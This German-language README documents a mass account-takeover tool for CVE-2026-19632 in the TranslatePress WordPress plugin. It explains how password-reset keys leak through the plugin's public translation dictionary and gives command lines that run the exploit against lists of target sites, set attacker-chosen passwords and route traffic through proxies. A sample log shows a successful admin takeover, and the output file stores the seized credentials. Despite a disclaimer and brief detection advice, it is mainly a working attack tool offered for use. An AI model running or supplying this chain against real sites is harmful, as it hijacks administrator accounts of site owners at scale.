
Nicht authentifizierter Account-Übernahme-PoC für TranslatePress Multilingual <= 3.3.1 (WordPress)
Massenwerkzeug zur Account-Übernahme für CVE-2026-19632, eine nicht authentifizierte Account-Übernahme im TranslatePress – Multilingual-WordPress-Plugin (≤ 3.3.1), verursacht durch die Offenlegung von Passwort-Reset-Links. Ein Befehl pro Zielliste — die gesamte Kette läuft automatisch ab, und jede erfolgreiche Übernahme wird in dem Moment, in dem sie passiert, in die Ausgabedatei geschrieben.
Haftungsausschluss — nur für autorisierte Nutzung. Dieses Tool ändert echte Kontopasswörter und löst echte Passwort-Reset-E-Mails aus. Verwenden Sie es ausschließlich gegen Systeme, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Genehmigung zum Testen haben. Der Autor ist nicht für Missbrauch verantwortlich.
| CVE | CVE-2026-19632 |
| Produkt | TranslatePress – Multilingual (WordPress-Plugin, Slug translatepress-multilingual), von Cozmoslabs |
| Betroffen | Alle Versionen ≤ 3.3.1 (über 400.000 aktive Installationen) |
| Behoben | 3.3.2 (Fix: current_user_can-Prüfung im öffentlichen Dictionary-AJAX-Handler) |
| CVSS 3.1 | 9.8 KRITISCH — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (CNA: Wordfence) |
| CWE | CWE-200 (Offenlegung sensibler Informationen) + CWE-640 (Schwacher Passwort-Wiederherstellungsmechanismus) |
| Auswirkung | Nicht authentifizierte Admin-Konto-Übernahme |
trp_data einschließlich des get_translations-Nonce aus. Nonces für abgemeldete Besucher sind standardmäßig öffentlich; das Plugin verlässt sich für die Sicherheit darauf.wp_mail ein und übersetzt ausgehende E-Mails in der Sprache des Empfängers. Wenn ein anonymer Angreifer wp-login.php?action=lostpassword für einen Admin auslöst, dessen Profilsprache eine veröffentlichte Sekundärsprache ist, wird die gesamte Reset-E-Mail — einschließlich der Klartext-wp-login.php?action=rp-URL mit dem gültigen Reset-Schlüssel — synchron innerhalb der Anfrage des Angreifers in wp_trp_dictionary_<default>_<locale> eingefügt. SMTP muss nicht einmal funktionieren.trp_get_translations_regular ist als wp_ajax_nopriv registriert und prüfte vor 3.3.2 nur das öffentliche Nonce. Jeder kann das Wörterbuch über string_ids aufzählen und den Schlüssel extrahieren.Vollständiger technischer Bericht: CVE-2026-19632-REPORT.md
cve-2026-19632.pyEin einzelnes, in sich geschlossenes Skript, das die vollständige Kette für jedes Ziel in einer Liste ausführt:
readme.txt-Fallback)trp_data + Sprachumschalter-Sondierung)url|username|password an die Ausgabedatei anhängen (Flush, threadsicher, kein Warten auf das Ende des Laufs)Eingebaute Robustheit:
--new-password).pip install -r requirements.txt
# vollständige Ausführung gegen eine Zielliste, 20 Threads
python cve-2026-19632.py -l targets.txt -o vuln.txt -t 20
# festes Passwort für jedes Ziel
python cve-2026-19632.py -l targets.txt -o vuln.txt -t 10 --new-password 'Pwn3d!2026'
# über einen Proxy
python cve-2026-19632.py -l targets.txt -o vuln.txt -t 10 --proxy http://127.0.0.1:8080
| Option | Beschreibung |
|---|---|
-l, --list | Datei mit einer Ziel-URL pro Zeile (#-Kommentare erlaubt) |
-o, --output | Ergebnisdatei, Format url|username|password (Standard vuln.txt) |
-t, --threads | Gleichzeitige Worker (Standard 10) |
--new-password | Festes Passwort für alle Ziele (Standard: zufällig 14 Zeichen pro Ziel) |
--timeout | Timeout pro Anfrage in Sekunden (Standard 15) |
--proxy | HTTP-Proxy, z. B. http://127.0.0.1:8080 |
--no-color | Farbige Ausgabe deaktivieren |
Terminalprotokoll gegen eine Laborinstanz (WordPress 7.0.4 + TranslatePress 3.3.1, ar Standard → en_US Sekundärsprache) — Werte bereinigt:
[00:09:06] [INFO] CVE-2026-19632 takeover tool - 3 target(s), 3 thread(s)...
[00:09:06] [SKIP] http://example.com (no TranslatePress)
[00:09:07] [INFO] http://TARGET TP found - langs: ar->en_US, nonce=a1b2c3d4e5
[00:09:09] [INFO] username candidates: ['admin', ...]
[00:09:09] [WARN] attempt 1/3 failed (stale key)
[00:09:09] [WARN] attempt 2/3 failed (stale key)
[00:09:09] [WARN] attempt 3/3 failed (stale key)
[00:09:09] [INFO] all keys stale - fresh reset trigger...
[00:09:15] [TAKEOVER] http://TARGET SUCCESS - user='admin' password='Pwn3d!2026'
[00:09:15] [INFO] done. summary: ERROR=1 | SKIP=1 | TAKEOVER=1
vuln.txt (live geschrieben, im Moment des Erfolgs):
http://TARGET|admin|Pwn3d!2026
Behandeln Sie
vuln.txtals sensibles Artefakt — es enthält Live-Anmeldedaten und/oder gültige Reset-Schlüssel. Fügen Sie es zu.gitignorehinzu.
Nicht erforderlich: ein funktionierender Mailserver (die URL wird im wp_mail-Filter gespeichert, vor dem Sendeversuch).
admin-ajax.php-Protokolle auf sequenzielle string_ids-Aufzählung mit einem öffentlichen security-Nonce überwachen.| Datum | Ereignis |
|---|---|
| 2026-08-12 | CVE-2026-19632 reserviert |
| 2026-08-13 | TranslatePress 3.3.2 mit dem Fix veröffentlicht |
| 2026-08-25/26 | Wordfence veröffentlicht die Empfehlung; 8.618 Ausnutzungsversuche innerhalb von 24 Stunden blockiert |
| 2026-08-28 | ThaiCERT-Empfehlung |
momopon1415) und das Wordfence-Team, im 3.3.2-Änderungsprotokoll genannt.MIT © 2026 ghostpel